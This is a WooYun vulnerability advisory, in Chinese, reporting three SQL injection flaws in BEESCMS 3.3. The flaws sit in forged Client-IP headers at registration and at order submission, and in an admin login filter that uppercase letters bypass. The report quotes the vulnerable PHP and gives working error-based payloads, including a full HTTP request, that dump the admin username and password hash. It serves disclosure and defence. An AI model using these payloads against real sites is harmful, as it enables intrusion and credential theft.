当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-055608

漏洞标题:BEESCMS企业网站管理系统SQL注入1

相关厂商:beescms.com

漏洞作者: xfkxfk

提交时间:2014-04-12 09:25

修复时间:2014-07-08 09:26

公开时间:2014-07-08 09:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-12: 细节已通知厂商并且等待厂商处理中
2014-04-17: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-06-11: 细节向核心白帽子及相关领域专家公开
2014-06-21: 细节向普通白帽子公开
2014-07-01: 细节向实习白帽子公开
2014-07-08: 细节向公众公开

简要描述:

BEESCMS企业网站管理系统V3.3某处SQL注入

详细说明:

第一处漏洞:
官方网站:http://www.beescms.com/
看看文件/member/member.php:

//用户注册处理
elseif($action=='save_reg'){
        $user=fl_html(fl_value($_POST['user']));
        $password=fl_html(fl_value($_POST['password']));
        $password2=fl_html(fl_value($_POST['password2']));
        $nich=fl_html(fl_value($_POST['nich']));
        $mail=fl_html(fl_value($_POST['mail']));
        $code=fl_html(fl_value($_POST['code']));
        if(!$_sys['web_member'][0]){
                die("<script type=\"text/javascript\">alert('{$language['member_msg5']}');history.go(-1);</script>");
        }
        if(!check_str($user,'/^[a-zA-Z][a-zA-Z0-9]{3,15}$/')){die("<script type=\"text/javascript\">alert('{$language['member_msg6']}');history.go(-1);</script>");}
        if(!check_str($nich,'/^[a-zA-Z][a-zA-Z0-9]{3,15}$/')){die("<script type=\"text/javascript\">alert('{$language['member_msg7']}');history.go(-1);</script>");}
        if(empty($password)||empty($password2)){die("<script type=\"text/javascript\">alert('{$language['member_msg8']}');history.go(-1);</script>");}
        if($password!=$password2){die("<script type=\"text/javascript\">alert('{$language['member_msg9']}');history.go(-1);</script>");}
        if(!check_str($mail,'/^[0-9a-z]+@(([0-9a-z]+)[.])+[a-z]{2,3}$/')){die("<script type=\"text/javascript\">alert('{$language['member_msg10']}');history.go(-1);</script>");}
        if(!empty($_sys['member_no_name'])){$no_name=explode('|',$_sys['member_no_name']);}
        if(is_array($no_name)){
                if(in_array($user,$no_name)){die("<script type=\"text/javascript\">alert('【".$user."】{$language['member_msg11']}');history.go(-1);</script>");}
        }
        if(!empty($_sys['safe_open'])){
                foreach($_sys['safe_open'] as $k=>$v){
                if($v=='1'){
                        if($code!=$_SESSION['code']){die("<script type=\"text/javascript\">alert('{$language['member_msg2']}');history.go(-1);</script>");}
                }
                }
                }
        
        
        $sql="select id from ".DB_PRE."member where member_user='{$user}'";
        if($GLOBALS['mysql']->fetch_rows($sql)){die($language['member_msg12']);}
        if(!$_sys['member_mail'][0]){
        $sql="select id from ".DB_PRE."member where member_mail='{$mail}'";
        if($GLOBALS['mysql']->fetch_rows($sql)){die($mail.$language['member_msg13']);}
        }
        $addtime=time();
        $password=md5($password);
        $sql="insert into ".DB_PRE."member (member_user,member_password,member_nich,member_mail,member_purview) values ('{$user}','{$password}','{$nich}','{$mail}',1)";
        $GLOBALS['mysql']->query($sql);
        $last_id=$GLOBALS['mysql']->insert_id();
        $ip=fl_html(fl_value(get_ip()));
        $sql="update ".DB_PRE."member set member_time='{$addtime}',member_ip='{$ip}' where id={$last_id}";
        $GLOBALS['mysql']->query($sql);
        die("<script type=\"text/javascript\">alert('{$language['member_msg14']}');location.href='member.php?action=login&lang=".$lang."';</script>");
}


看到
$ip=fl_html(fl_value(get_ip()));
然后直接进入update
来看看这两个函数:

function get_ip(){
if(!empty($_SERVER['HTTP_CLIENT_IP']))
        {
                return $_SERVER['HTTP_CLIENT_IP'];
        }
        elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
                return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        else
        {
                return $_SERVER['REMOTE_ADDR'];
        }
}
......
function fl_value($str){
        if(empty($str)){return;}
        return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/','',$str);
}
function fl_html($str){
        return htmlspecialchars($str);
}


get_ip没有任何过滤,直接赋值。
fl_value可以通过大写绕过。
fl_html转义实体不影响我们注入。
第二处漏洞:
官方网址:http://www.beescms.com/
看看文件/mx_form/order_save.php:

addtime=time();
$ip=fl_value(get_ip());
$ip=fl_html($ip);
$member_id=empty($_SESSION['id'])?0:$_SESSION['id'];
$arc_id=empty($f_id)?0:intval($_POST['f_id']);
$sql="insert into ".DB_PRE."formlist (form_id,form_time,form_ip,member_id,arc_id) values ({$form_id},{$addtime},'{$ip}','{$member_id}','{$arc_id}')";
$mysql->query($sql);
$last_id=$mysql->insert_id();
$sql_field='id'.$sql_field;
$sql_value=$last_id.$sql_value;
$sql="insert into ".DB_PRE."{$table} ({$sql_field}) values ({$sql_value})";
$mysql->query($sql);


在产品中心——订购产品时,提交订单时
将ipinsert到表中,导致sql注入。
ip=fl_value(get_ip());
$ip=fl_html($ip);
来看看这两个函数:

function get_ip(){
if(!empty($_SERVER['HTTP_CLIENT_IP']))
        {
                return $_SERVER['HTTP_CLIENT_IP'];
        }
        elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
        {
                return $_SERVER['HTTP_X_FORWARDED_FOR'];
        }
        else
        {
                return $_SERVER['REMOTE_ADDR'];
        }
function fl_value($str){
        if(empty($str)){return;}
        return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/','',$str);
}
function fl_html($str){
        return htmlspecialchars($str);
}


get_ip没有任何过滤,直接负值。
fl_value可以通过大写绕过。
fl_html转义实体不影响我们注入。
第三处漏洞:
官方网址:http://www.beescms.com/
后台登陆处
文件/admin/login.php:

//判断登录
elseif($action=='ck_login'){
        global $submit,$user,$password,$_sys,$code;
        $submit=$_POST['submit'];
        $user=fl_html(fl_value($_POST['user']));
        $password=fl_html(fl_value($_POST['password']));
        $code=$_POST['code'];
        if(!isset($submit)){
                msg('请从登陆页面进入');
        }
        if(empty($user)||empty($password)){
                msg("密码或用户名不能为空");
        }
        if(!empty($_sys['safe_open'])){
                foreach($_sys['safe_open'] as $k=>$v){
                if($v=='3'){
                        if($code!=$s_code){msg("验证码不正确!");}
                }
                }
                }
        check_login($user,$password);


POST进来的username和password经过了
fl_html和fl_value的过滤:

function fl_value($str){
        if(empty($str)){return;}
        return preg_replace('/select|insert | update | and | in | on | left | joins | delete |\%|\=|\/\*|\*|\.\.\/|\.\/| union | from | where | group | into |load_file
|outfile/','',$str);
}
function fl_html($str){
        return htmlspecialchars($str);
}


来看看这两个函数:
fl_value可以通过大写绕过。
fl_html转义实体不影响我们注入。
进入check_login函数:

function check_login($user,$password){
        $rel=$GLOBALS['mysql']->fetch_asc("select id,admin_name,admin_password,admin_purview,is_disable from ".DB_PRE."admin where admin_name='".$user."' limit 0,1");  
        $rel=empty($rel)?'':$rel[0];
        if(empty($rel)){
                msg('不存在该管理用户','login.php');
        }
        $password=md5($password);
        if($password!=$rel['admin_password']){
                msg("输入的密码不正确");
        }
        if($rel['is_disable']){
                msg('该账号已经被锁定,无法登陆');
        }
        
        $_SESSION['admin']=$rel['admin_name'];
        $_SESSION['admin_purview']=$rel['admin_purview'];
        $_SESSION['admin_id']=$rel['id'];
        $_SESSION['admin_time']=time();
        $_SESSION['login_in']=1;
        $_SESSION['login_time']=time();
        $ip=fl_value(get_ip());
        $ip=fl_html($ip);
        $_SESSION['admin_ip']=$ip;
        unset($rel);
        header("location:admin.php");
}


综上所述,POST的内容虽然经过了过滤,但是可以绕过。
所以绕过后继续存在注入。

漏洞证明:

第一处漏洞:
在注册时截包,伪造头信息,添加如下头信息:
Client-ip: 1.1.1.1' AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(admin_name,0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b)#

e.png


第二处漏洞:
订购商品,提交订单时,截包,修改头信息添加Client-ip,发送请求如下:

POST /beescms/mx_form/order_save.php HTTP/1.1
Host: localhost
Client-ip: 127.0.0.1',(SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(admin_name,0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b))#
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 195
form_id=5&fields[mail]=&fields[username]=test111&fields[tel]=13111111111&fields[web_contact][email protected]&fields[address]=111111&fields[content]=111111&lang=cn&f_id=21&submit=%E6%8F%90%E4%BA%A4


成功爆出管理员账户:

f.png


第三处漏洞:
后台登陆处,发送请求:
连接:
http://localhost/beescms/admin/login.php?action=ck_login
POST:
user=admin' UNION (SELECT 1,2,3,4,5 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(admin_name,0x23,admin_password) FROM bees_admin LIMIT 0,1))a FROM information_schema.tables GROUP by a)b)#&password=admin&code=bc27&submit=true&submit.x=28&submit.y=21
成功爆出管理员账户:

g.png

修复方案:

过滤从server取出来的内容

版权声明:转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-07-08 09:26

厂商回复:

最新状态:

暂无